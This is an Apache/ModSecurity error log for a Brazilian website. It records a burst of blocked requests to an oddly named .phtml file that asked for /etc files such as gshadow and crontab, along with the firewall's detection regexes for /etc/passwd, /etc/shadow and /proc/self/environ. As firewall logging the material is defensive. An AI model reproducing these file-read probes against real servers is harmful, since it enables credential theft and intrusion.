[Thu Mar 19 13:21:29.235677 2026] [:error] [pid 31803:tid 140411574073088] [client 57.141.18.58:48328] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiieyqAr6etmhZHNpyyAAAAFQ"]
[Thu Mar 19 13:21:29.540786 2026] [:error] [pid 30077:tid 140411574073088] [client 57.141.18.123:48334] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiifu8EFLIOrSqIpu7ZQAAAlQ"]
[Thu Mar 19 13:21:29.737092 2026] [:error] [pid 26799:tid 140411574073088] [client 57.141.18.9:48344] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiida6ubjKNq_cu4ZpqgAAA1Q"]
[Thu Mar 19 13:21:30.020409 2026] [:error] [pid 14269:tid 140411658000128] [client 57.141.18.53:48348] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiigbLMZ6AikZjR9VwVgAAAAo"]
[Thu Mar 19 13:21:30.497559 2026] [:error] [pid 27293:tid 140411733534464] [client 57.141.18.91:48360] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiiv-YZRR_7pZ7nDKeVwAAA8E"]
[Thu Mar 19 13:21:30.914474 2026] [:error] [pid 15826:tid 140411733534464] [client 57.141.18.41:48368] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiiuoXxyEfFpUF8f8f4AAAAUE"]
[Thu Mar 19 13:21:30.937150 2026] [:error] [pid 31803:tid 140411607643904] [client 57.141.18.51:48370] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiiuyqAr6etmhZHNpyyQAAAFA"]
[Thu Mar 19 13:21:31.239482 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.11:48384] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwii9a6ubjKNq_cu4ZpqwAAA0M"]
[Thu Mar 19 13:21:31.396297 2026] [:error] [pid 14269:tid 140411649607424] [client 57.141.18.28:48390] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwiiwbLMZ6AikZjR9VwVwAAAAs"]
[Thu Mar 19 13:21:32.271007 2026] [:error] [pid 31803:tid 140411565680384] [client 57.141.18.18:48408] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwijOyqAr6etmhZHNpyygAAAFU"]
[Thu Mar 19 13:21:32.736131 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.83:48420] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwijOoXxyEfFpUF8f8f4QAAAUU"]
[Thu Mar 19 13:21:33.571433 2026] [:error] [pid 19093:tid 140411716749056] [client 57.141.18.74:48444] [client 57.141.18.74] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc3.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwijV_V7PWP6ixUYl7PlQAAAoM"]
[Thu Mar 19 13:21:33.645900 2026] [proxy_fcgi:error] [pid 31803:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44784] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 13:21:35.136731 2026] [:error] [pid 17887:tid 140411616036608] [client 57.141.18.104:48462] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwijgkwaGbbGflqUZDaggAAAM8"]
[Thu Mar 19 13:21:35.139469 2026] [:error] [pid 26799:tid 140411708356352] [client 57.141.18.84:48478] [client 57.141.18.84] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwijta6ubjKNq_cu4ZprAAAA0Q"]
[Thu Mar 19 13:21:35.141230 2026] [:error] [pid 31803:tid 140411741927168] [client 57.141.18.80:48454] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/asound.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwijeyqAr6etmhZHNpyywAAAEA"]
[Thu Mar 19 13:21:35.142653 2026] [:error] [pid 31803:tid 140411699963648] [client 57.141.18.53:48468] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwijuyqAr6etmhZHNpyzAAAAEU"]
[Thu Mar 19 13:21:35.142656 2026] [:error] [pid 14269:tid 140411565680384] [client 57.141.18.109:48460] [client 57.141.18.109] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwijQbLMZ6AikZjR9VwWQAAABU"]
[Thu Mar 19 13:21:35.144224 2026] [:error] [pid 14269:tid 140411574073088] [client 57.141.18.23:48456] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwijQbLMZ6AikZjR9VwWAAAABQ"]
[Thu Mar 19 13:21:35.692973 2026] [:error] [pid 27293:tid 140411691570944] [client 57.141.18.56:48498] [client 57.141.18.56] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwij_-YZRR_7pZ7nDKeWwAAA8Y"]
[Thu Mar 19 13:21:36.020998 2026] [:error] [pid 15826:tid 140411674785536] [client 57.141.18.49:48502] [client 57.141.18.49] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwikOoXxyEfFpUF8f8f5QAAAUg"]
[Thu Mar 19 13:21:36.062178 2026] [:error] [pid 27293:tid 140411741927168] [client 57.141.18.93:48504] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwikP-YZRR_7pZ7nDKeXAAAA8A"]
[Thu Mar 19 13:21:36.294756 2026] [:error] [pid 17887:tid 140411641214720] [client 57.141.18.37:48512] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwikAkwaGbbGflqUZDagwAAAMw"]
[Thu Mar 19 13:21:37.006382 2026] [:error] [pid 26799:tid 140411557287680] [client 57.141.18.20:48526] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwikda6ubjKNq_cu4ZprQAAA1Y"]
[Thu Mar 19 13:21:37.227775 2026] [:error] [pid 14269:tid 140411599251200] [client 57.141.18.33:48532] [client 57.141.18.33] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwikQbLMZ6AikZjR9VwWgAAABE"]
[Thu Mar 19 13:21:37.748866 2026] [:error] [pid 30077:tid 140411557287680] [client 57.141.18.70:48552] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwikfu8EFLIOrSqIpu7aQAAAlY"]
[Thu Mar 19 13:21:38.143529 2026] [:error] [pid 31803:tid 140411649607424] [client 57.141.18.81:48562] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.256color"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwikuyqAr6etmhZHNpyzgAAAEs"]
[Thu Mar 19 13:21:38.811370 2026] [:error] [pid 14269:tid 140411733534464] [client 57.141.18.88:48576] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwikgbLMZ6AikZjR9VwWwAAAAE"]
[Thu Mar 19 13:21:38.815276 2026] [:error] [pid 30077:tid 140411691570944] [client 57.141.18.9:48578] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwikvu8EFLIOrSqIpu7awAAAkY"]
[Thu Mar 19 13:21:40.259014 2026] [:error] [pid 26799:tid 140411599251200] [client 57.141.18.58:48590] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/bifronted/forespent013619284238.phtml"] [unique_id "abwik9a6ubjKNq_cu4ZprgAAA1E"]
